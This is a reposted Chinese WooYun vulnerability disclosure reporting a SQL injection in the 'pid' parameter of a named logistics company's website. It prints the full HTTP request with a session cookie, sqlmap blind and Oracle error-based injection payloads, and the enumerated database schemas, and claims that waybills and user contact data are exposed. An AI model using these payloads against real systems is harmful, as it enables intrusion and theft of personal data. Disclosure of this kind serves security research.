盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱,另可getshell

admin
admin
admin
139803
文章
114
评论
2017年4月20日01:36:05评论383 views字数 239阅读0分47秒阅读模式
摘要

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-193076

漏洞标题: 盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱,另可getshell

相关厂商: 盛辉物流

漏洞作者: Adoubi

提交时间: 2016-04-06 21:05

公开时间: 2016-05-21 21:10

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

0人收藏

漏洞详情

披露状态:

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

盛辉物流主站某处sql注入,泄露所有运单信息,以及用户资料

详细说明:

http://www.shenghui56.com/

注入产生在此处

盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱,另可getshell

code 区域 
POST /api/getcity HTTP/1.1
 Host: www.shenghui56.com
 Content-Length: 10
 Accept: application/json, text/javascript, */*; q=0.01
 Origin: http://www.shenghui56.com
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: http://www.shenghui56.com/
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: JSESSIONID=F78D3014F8BDECE128318FDC1E83A1CE; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1459869997; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1459869997
 
 pid=350000
code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: POST
 Parameter: pid
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
 
     Type: error-based
     Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
     Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
 ---
 [12:49:34] [INFO] the back-end DBMS is Oracle
 back-end DBMS: Oracle
 [12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
 [12:49:34] [INFO] fetching database (schema) names
 [12:49:34] [INFO] the SQL query used returns 24 entries
 available databases [24]:
 [*] APEX_030200
 [*] APPQOSSYS
 [*] CTXSYS
 [*] DBSNMP
 [*] EXFSYS
 [*] FLOWS_FILES
 [*] HD
 [*] MDSYS
 [*] MWLAPP
 [*] OLAPSYS
 [*] ORDDATA
 [*] ORDSYS
 [*] OUTLN
 [*] OWBSYS
 [*] SHAC
 [*] SHEFFE
 [*] SHITEM
 [*] SHWLAPP
 [*] SMS_XTTX
 [*] SYS
 [*] SYSMAN
 [*] SYSTEM
 [*] WMSYS
 [*] XDB

漏洞证明:

code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: POST
 Parameter: pid
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
 
     Type: error-based
     Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
     Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
 ---
 [12:49:34] [INFO] the back-end DBMS is Oracle
 back-end DBMS: Oracle
 [12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
 [12:49:34] [INFO] fetching database (schema) names
 [12:49:34] [INFO] the SQL query used returns 24 entries
 available databases [24]:
 [*] APEX_030200
 [*] APPQOSSYS
 [*] CTXSYS
 [*] DBSNMP
 [*] EXFSYS
 [*] FLOWS_FILES
 [*] HD
 [*] MDSYS
 [*] MWLAPP
 [*] OLAPSYS
 [*] ORDDATA
 [*] ORDSYS
 [*] OUTLN
 [*] OWBSYS
 [*] SHAC
 [*] SHEFFE
 [*] SHITEM
 [*] SHWLAPP
 [*] SMS_XTTX
 [*] SYS
 [*] SYSMAN
 [*] SYSTEM
 [*] WMSYS
 [*] XDB
code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: POST
 Parameter: pid
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
 
     Type: error-based
     Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
     Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
 ---
 [12:51:16] [INFO] the back-end DBMS is Oracle
 back-end DBMS: Oracle
 [12:51:16] [INFO] fetching current database
 [12:51:16] [INFO] resumed: SHWLAPP
 current schema (equivalent to database on Oracle):    'SHWLAPP'

盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱,另可getshell

盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱,另可getshell

只是跑跑了数据个数,不干脱裤那种事。。。

修复方案:

过滤啊大哥。。地址也是可控的

版权声明:转载请注明来源 Adoubi@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin